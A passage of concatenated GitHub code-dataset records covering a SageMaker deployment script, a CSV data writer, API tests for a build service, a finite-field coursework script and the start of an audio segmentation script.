Estimator\n\n\nparser = argparse.ArgumentParser(description='Deploy a trained model to SageMaker endpoint.')\nparser.add_argument('region', type=str,\n help='Default region when creating new connections.')\nparser.add_argument('train_job', type=str,\n help='Name of training job to attach to.')\nparser.add_argument('-e', '--endpoint_name', type=str, default=None, metavar='',\n help='Name to assign to SageMaker endpoint.')\nargs = parser.parse_args()\n\n\nif __name__ == '__main__':\n boto3_sess = boto3.Session(region_name=args.region)\n sagemaker_sess = sagemaker.Session(boto3_sess)\n attached_estimator = Estimator.attach(args.train_job,\n sagemaker_session=sagemaker_sess)\n print(\"\\nDeploying model...\")\n _ = attached_estimator.deploy(initial_instance_count=1,\n instance_type='ml.t2.medium',\n endpoint_name=args.endpoint_name)\n print(\"\\nModel is deployed.\\n\")\n","repo_name":"michotross257/stsci-image-classification","sub_path":"sagemaker-deploy-existing-model.py","file_name":"sagemaker-deploy-existing-model.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42980885506","text":"import csv\n\nfrom itertools import product\n\nfrom os.path import join\n\nfrom tqdm import tqdm\n\nfrom numpy import ndarray\n\nfrom ridt.base import RIDTOSError\n\nfrom ridt.config import RIDTConfig\nfrom ridt.config import Units\n\nfrom .directoryagent import DirectoryAgent\n\nfrom ridt.container import Domain\n\nfrom .datastore import DataStore\n\nfrom ridt import bar_args\n\n\nclass DataStoreCSVWriter:\n \"\"\"Class that writes a :class:`~.DataStore` instance to CSV files.\n\n Attributes\n ----------\n settings : :class:`~.RIDTConfig`\n The settings for the run in question.\n\n dir_agent : :class:`~.DirectoryAgent`\n The path to the output directory for the run.\n \n domain : :class:`~.Domain`\n The instance of :class:`~.Domain` corresponding to :attr:`setting`.\n\n units : :class:`~.Units`\n The instance of :class:`~.Units` corresponding to :attr:`setting`.\n\n data_store : :class:`~.DataStore`\n The data store to be analysed.\n\n quantity: :obj:`str`\n The string id for the quantity stored in the data store.\n\n \"\"\" \n\n def __init__(self,\n setting: RIDTConfig,\n data_store: DataStore,\n dir_agent: DirectoryAgent,\n quantity: str):\n \"\"\"The :class:`DataStoreCSVWriter` constructor.\n\n Parameters\n ----------\n settings : :class:`~.RIDTConfig`\n The settings for the run in question.\n\n dir_agent : :class:`~.DirectoryAgent`\n The path to the output directory for the run.\n \n data_store : :class:`~.DataStore`\n The data store to be analysed.\n\n quantity: :obj:`str`\n The string id for the quantity stored in the data store.\n\n \"\"\"\n self.dir_agent = dir_agent\n self.setting = setting\n self.units = Units(setting)\n self.domain = Domain(setting)\n self.quantity = quantity\n self.write(data_store)\n \n @property\n def geometries(self):\n \"\"\":obj:`list` [:obj:`str`] : the list of geometries selected for\n evaluation in :attr:`settings`.\n\n \"\"\"\n locations = self.setting.models.eddy_diffusion.monitor_locations\n return [g for g, e in locations.evaluate.items() if e]\n\n def write(self, data_store: DataStore) -> None:\n \"\"\"Loops over entries in the data store and writes the data to csv file.\n\n Parameters\n ----------\n data_store : :class:`~.DataStore`\n The data store to be analysed.\n \n Returns\n -------\n None\n\n \"\"\"\n for geometry in self.geometries:\n self.dir_agent.create_data_dir(geometry, self.quantity)\n for id in getattr(data_store, geometry):\n self.write_csv(geometry, id, data_store.get(geometry, id))\n \n def write_csv(self, geometry: str, id: str, data: ndarray) -> None:\n \"\"\"Takes string identifiers and the grid and writes them to a csv file.\n\n Parameters\n ----------\n geometry : :obj:`str`\n The type of grid to be written.\n\n id : :obj:`str`\n The id of the grid to be written.\n\n data : :class:`~numpy.ndarray`\n The grid to be written.\n\n Raises\n ------\n :class:`~.RIDTOSError`\n If unable to create the file on disk.\n \n Returns\n -------\n None\n\n \"\"\"\n path = join(self.dir_agent.ddir, id + \".csv\")\n factor = getattr(self.units, f\"{self.quantity}_factor\")\n\n try:\n f = open(path, 'w', newline=\"\")\n except OSError as e:\n raise RIDTOSError(e)\n\n writer = csv.writer(f, delimiter=\",\")\n writer.writerow([\n f\"time ({self.units.time})\",\n f\"x ({self.units.space})\",\n f\"y ({self.units.space})\",\n f\"z ({self.units.space})\",\n f\"value ({getattr(self.units, f'{self.quantity}')})\"\n ])\n\n indices = list(product(*[range(i) for i in data.shape]))\n\n print(f\"Writing {id} {self.quantity} data to a csv file...\")\n for index in tqdm(indices, total=len(indices), **bar_args):\n values = self.domain.values(id, index)\n writer.writerow(list(values) + [data[index] / factor])\n f.close()","repo_name":"riskaware-ltd/ridt","sub_path":"ridt/data/datastorecsvwriter.py","file_name":"datastorecsvwriter.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2166588825","text":"from cStringIO import StringIO\n\nfrom changes.config import db\nfrom changes.models import Job, JobPlan, ProjectOption\nfrom changes.testutils import APITestCase, SAMPLE_DIFF\n\n\nclass BuildListTest(APITestCase):\n path = '/api/0/builds/'\n\n def test_simple(self):\n build = self.create_build(self.project)\n build2 = self.create_build(self.project2)\n\n resp = self.client.get(self.path)\n assert resp.status_code == 200\n data = self.unserialize(resp)\n assert len(data) == 2\n assert data[0]['id'] == build2.id.hex\n assert data[1]['id'] == build.id.hex\n\n\nclass BuildCreateTest(APITestCase):\n path = '/api/0/builds/'\n\n def test_minimal(self):\n resp = self.client.post(self.path, data={\n 'sha': 'a' * 40,\n 'project': self.project.slug,\n })\n assert resp.status_code == 200\n data = self.unserialize(resp)\n assert len(data) == 1\n assert data[0]['id']\n\n job = Job.query.filter(\n Job.build_id == data[0]['id']\n ).first()\n build = job.build\n source = build.source\n\n assert job.project == self.project\n\n assert source.repository_id == self.project.repository_id\n assert source.revision_sha == 'a' * 40\n\n def test_defaults_to_revision(self):\n revision = self.create_revision(sha='a' * 40)\n resp = self.client.post(self.path, data={\n 'sha': 'a' * 40,\n 'project': self.project.slug,\n })\n assert resp.status_code == 200\n data = self.unserialize(resp)\n assert len(data) == 1\n assert data[0]['id']\n\n job = Job.query.filter(\n Job.build_id == data[0]['id']\n ).first()\n build = job.build\n source = build.source\n\n assert build.message == revision.message\n assert build.author == revision.author\n assert build.label == revision.subject\n\n assert job.project == self.project\n\n assert source.repository_id == self.project.repository_id\n assert source.revision_sha == 'a' * 40\n\n def test_with_full_params(self):\n resp = self.client.post(self.path, data={\n 'project': self.project.slug,\n 'sha': 'a' * 40,\n 'target': 'D1234',\n 'label': 'Foo Bar',\n 'message': 'Hello world!',\n 'author': 'David Cramer ',\n 'patch': (StringIO(SAMPLE_DIFF), 'foo.diff'),\n 'patch[data]': '{\"foo\": \"bar\"}',\n })\n assert resp.status_code == 200, resp.data\n\n data = self.unserialize(resp)\n assert len(data) == 1\n assert data[0]['id']\n\n job = Job.query.filter(\n Job.build_id == data[0]['id']\n ).first()\n build = job.build\n source = build.source\n\n assert build.author.name == 'David Cramer'\n assert build.author.email == 'dcramer@example.com'\n assert build.message == 'Hello world!'\n assert build.label == 'Foo Bar'\n assert build.target == 'D1234'\n\n assert job.project == self.project\n assert job.label == self.plan.label\n\n assert source.repository_id == self.project.repository_id\n assert source.revision_sha == 'a' * 40\n assert source.data == {'foo': 'bar'}\n\n patch = source.patch\n assert patch.diff == SAMPLE_DIFF\n assert patch.parent_revision_sha == 'a' * 40\n\n jobplans = list(JobPlan.query.filter(\n JobPlan.build_id == build.id,\n ))\n\n assert len(jobplans) == 1\n\n assert jobplans[0].plan_id == self.plan.id\n assert jobplans[0].project_id == self.project.id\n\n def test_with_repository(self):\n plan = self.create_plan()\n repo = self.create_repo()\n\n project1 = self.create_project(repository=repo)\n project2 = self.create_project(repository=repo)\n plan.projects.append(project1)\n plan.projects.append(project2)\n db.session.commit()\n\n resp = self.client.post(self.path, data={\n 'repository': repo.url,\n 'sha': 'a' * 40,\n })\n assert resp.status_code == 200\n data = self.unserialize(resp)\n assert len(data) == 2\n\n def test_with_patch_without_diffs_enabled(self):\n po = ProjectOption(\n project=self.project,\n name='build.allow-patches',\n value='0',\n )\n db.session.add(po)\n db.session.commit()\n\n resp = self.client.post(self.path, data={\n 'sha': 'a' * 40,\n 'project': self.project.slug,\n 'patch': (StringIO(SAMPLE_DIFF), 'foo.diff'),\n 'patch[label]': 'D1234',\n })\n assert resp.status_code == 200, resp.data\n data = self.unserialize(resp)\n assert len(data) == 0\n","repo_name":"dlitz/changes","sub_path":"tests/changes/api/test_build_index.py","file_name":"test_build_index.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"10950046938","text":"########################################################################################################################\n# Problem 1\n########################################################################################################################\n# The task is to find the invertible elements of Z_20.\n# ==> Iterate thru x, y in 0..19 and check whether xy == 1\n\nprint(f\"PROBLEM 1:\")\nprint(f\"Finding multiplicative inverses...\\n\")\ninvertibles = set()\nfor y in range(20):\n for x in range(0, y + 1):\n result = (x * y) % 20\n if result == 1:\n print(f\"{x} * {y} = {x * y} = {result}\")\n invertibles.add(x)\n invertibles.add(y)\n\nprint(f\"\\nThe invertible elements are {invertibles}.\\n\\n\")\n\n########################################################################################################################\n########################################################################################################################\n\n\n########################################################################################################################\n# Problem 3\n########################################################################################################################\n# The task is to find all primitive roots modulo 17.\n# This is equivalent to finding all generators of the multiplicative group of integers modulo 17.\n# ==> Thus find all generators...\n\nprint(f\"PROBLEM 3:\")\nprint(f\"Computing generators...\\n\")\ngenerators = set()\ngroup = set(range(1, 17))\nfor x in group:\n generated = set()\n newElem = x\n while True:\n if newElem in generated:\n break\n generated.add(newElem)\n newElem = newElem * x % 17\n if generated == group:\n generators.add(x)\n\nprint(f\"The generators are {generators}.\\n\\n\")\n\n########################################################################################################################\n########################################################################################################################\n\n\n########################################################################################################################\n# Problem 4\n########################################################################################################################\n# The task is to construct a addition/multiplication tables for GF(2^3) using the polynomial x^3 + x^2 + 1.\n\nprint(f\"PROBLEM 4 part a:\")\nprint(f\"Computing the operation tables for GF(2^3) using the polynomial x^3 + x^2 + 1.\\n\")\n\n# Represent polynomials as lists\nfield = [[x, y, z] for x in range(2) for y in range(2) for z in range(2)]\n\n# Create a function to add polynomials\ndef add(x, y):\n length = max(len(x), len(y))\n z = list(map(lambda a: 0, range(length)))\n for i in range(length):\n a = 0\n if i < len(x):\n a += x[i]\n if i < len(y):\n a += y[i]\n z[i] = a % 2\n return z\n\n# Create function to multiply polynomials\ndef multiply(x, y):\n length = max(len(x), len(y))\n z = list(map(lambda a: 0, range(length)))\n for i in range(len(y)):\n if y[i] == 1:\n z = add(z, list(map(lambda a: 0, range(i))) + x)\n return z\n\n# Create a function that reduces polynomials wrt magic law 1 given by x^3 + x^2 + 1.\ndef magic_law1(x):\n z = x.copy()\n for i in range(len(x) - 1, 2, -1):\n if z[i] == 1:\n modifier = list(map(lambda a: 0, range(i - 3))) + [1, 0, 1, 1]\n z = add(z, modifier)\n return z\n\ndef add_field1(x, y):\n return magic_law1(add(x, y))\n\ndef multiply_field1(x, y):\n return magic_law1(multiply(x, y))\n\n# Create function to return nicer representation\ndef prettyPrint(x):\n return f\"{x[2]}{x[1]}{x[0]}\"\n\n# Create function to print a table\ndef createTable(elems, op):\n elems = list(elems)\n # Create header row\n print(f\"{'':4}| \", end='')\n for e in elems:\n print(f\"{prettyPrint(e):4}\", end='')\n print(\"\")\n # Print horizontal line\n print(\"----|-\", end='')\n for i in range(len(elems)):\n print(\"----\", end='')\n print(\"\")\n for x in elems:\n print(f\"{prettyPrint(x):4}| \", end='')\n for y in elems:\n print(f\"{prettyPrint(op(x, y)):4}\", end='')\n print(\"\")\n\nprint(f\"Addition table:\")\ncreateTable(field, add_field1)\nprint(f\"\\n\\nMultiplication table:\")\ncreateTable(field, multiply_field1)\nprint(\"\\n\")\n\n\nprint(f\"PROBLEM 4 part b:\")\n# Make sure the polynomial x^3 + x^2 + 1 is irreducible.\n\ndef degree(x):\n for i in range(len(x) - 1, -1, -1):\n if x[i] == 1:\n break\n return i\n\ndef trim(x):\n return x[:(degree(x) + 1)]\n\nfactor_candidates = [(x, y) for x in field for y in field if degree(x) + degree(y) == 3]\nfound_factors = False\nfor x, y in factor_candidates:\n if trim(multiply(x, y)) == [1, 0, 1, 1]:\n found_factors = True\n break\nif found_factors:\n print(f\"The polynomial is not irreducible!!!!\")\nelse:\n print(f\"The polynomial is irreducible!!!!\")\n\nprint(\"\\n\")\n########################################################################################################################\n########################################################################################################################\n\n########################################################################################################################\n# Problem 5\n########################################################################################################################\n# The task is to construct a addition/multiplication tables for GF(2^3) using the polynomial x^3 + x + 1.\n\nprint(f\"PROBLEM 5 part a:\")\nprint(f\"Computing the operation tables for GF(2^3) using the polynomial x^3 + x + 1.\\n\")\n\n# Create a function that reduces polynomials wrt magic law 2 given by x^3 + x + 1.\ndef magic_law2(x):\n z = x.copy()\n for i in range(len(x) - 1, 2, -1):\n if z[i] == 1:\n modifier = list(map(lambda a: 0, range(i - 3))) + [1, 1, 0, 1]\n z = add(z, modifier)\n return z\n\ndef add_field2(x, y):\n return magic_law2(add(x, y))\n\ndef multiply_field2(x, y):\n return magic_law2(multiply(x, y))\n\nprint(f\"Addition table:\")\ncreateTable(field, add_field2)\nprint(f\"\\n\\nMultiplication table:\")\ncreateTable(field, multiply_field2)\nprint(\"\\n\")\n\n\nprint(f\"PROBLEM 5 part b:\")\n\n\n# Define isomorphism candidates\ndef h1(x):\n a = x[2]\n b = x[1]\n c = x[0]\n y = [0, 0, 0]\n y[0] = (a + b + c) % 2\n y[1] = (a) % 2\n y[2] = (a + b) % 2\n return y\n\n\ndef h2(x):\n a = x[2]\n b = x[1]\n c = x[0]\n y = [0, 0, 0]\n y[0] = (c) % 2\n y[1] = (a + b) % 2\n y[2] = (b) % 2\n return y\n\n\ndef h3(x):\n a = x[2]\n b = x[1]\n c = x[0]\n y = [0, 0, 0]\n y[0] = (a + b + c) % 2\n y[1] = (a + b) % 2\n y[2] = (b) % 2\n return y\n\n\n# Create function to test a candidate for isomorphism\ndef test_candidate(candidate):\n still_valid = True\n for x in field:\n if not still_valid:\n break\n for y in field:\n if not still_valid:\n break\n lhs = trim(candidate(multiply_field1(x, y)))\n rhs = trim(multiply_field2(candidate(x), candidate(y)))\n if lhs != rhs:\n print(f\"Found a counterexample:\\n\"\n f\"h({prettyPrint(x)} *_f {prettyPrint(y)}) = {prettyPrint(lhs)}\\n\"\n f\"h({prettyPrint(x)}) *_g h({prettyPrint(y)}) = {prettyPrint(rhs)}\\n\"\n f\"{prettyPrint(lhs)} != {prettyPrint(rhs)}\\n\")\n still_valid = False\n lhs = trim(candidate(add_field1(x, y)))\n rhs = trim(add_field2(candidate(x), candidate(y)))\n if lhs != rhs:\n print(f\"Found a counterexample:\\n\"\n f\"h({prettyPrint(x)} +_f {prettyPrint(y)}) = {prettyPrint(lhs)}\\n\"\n f\"h({prettyPrint(x)}) +_g h({prettyPrint(y)}) = {prettyPrint(rhs)}\\n\"\n f\"{prettyPrint(lhs)} != {prettyPrint(rhs)}\\n\")\n still_valid = False\n if still_valid:\n print(f\"Isomorphism laws hold!!!\")\n\n\nprint(f\"Testing isomorphism candidates:\\n\")\nprint(f\"Testing candidate 1\")\ntest_candidate(h1)\nprint(f\"\\nTesting candidate 2\")\ntest_candidate(h2)\nprint(f\"\\nTesting candidate 3\")\ntest_candidate(h3)\n\n\n\n########################################################################################################################\n########################################################################################################################\n\n","repo_name":"J-Savela/Crypto","sub_path":"src/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":8536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72441158213","text":"import random\nimport sys\nimport os\nsys.path.insert(0,'./..')\nimport numpy as np\nimport wave\nimport scipy.io.wavfile as wavfile\nimport math\nimport soundfile as sf\nfrom python_speech_features import mfcc\nfrom numpy.linalg import inv\nfrom scipy.stats import norm\n\n\nfrom peakdetect import peakdet\nfrom readcsv import getcsvfeat\n\n\n\n#feat_file : CSV file with THE FEATURES; SHAPE=(nDimensions X Samples)\n#wav_file: filename of the audio WAV FILE\n\n#usually : amplitude=1, dist_1=4.2\n#numfrwin=window size=100(1s);(each frame=10ms)\n#returns TimeStamp,FrameStamp, and the Features(which is inputted by the User; passed to CLustering Function\n\n\ndef segment(wav_file,feat_file,amplitude,dist_1,numfrwin,nsh):\n\n x, fs = sf.read(wav_file)\n\n if(feat_file=='NoneProvided'):\n feat = mfcc(x,fs,0.025,0.010,13)\n feat= feat.transpose()\n nsh=0.010\n print('using Inbuilt MFFCs as features')\n else:\n feat=getcsvfeat(feat_file)\n if(nsh==1):\n print('ERROR, please enter -res (Window Shift) as Features are provided')\n sys.exit()\n print('using provided Features')\n\n \n\n print(nsh)\n win_ind_1=0\n win_ind_2=win_ind_1+numfrwin\n\n \n dim=len(feat[:,1])#to find the dimensions of the FEATURE\n \n dist=0\n count=0\n w1=np.zeros((dim,numfrwin))\n w2=np.zeros((dim,numfrwin))\n w3=np.zeros((dim,2*numfrwin))\n d=[]\n frame_no=[]\n num_frame=len(feat[1,:])\n Nw=math.floor(fs*0.025)\n Nsh=math.floor(fs*nsh)#0.010 by default\n\n frame_index_w1=0\n frame_index_w2=0+numfrwin*Nsh\n\n \n\n \n while(win_ind_2+numfrwin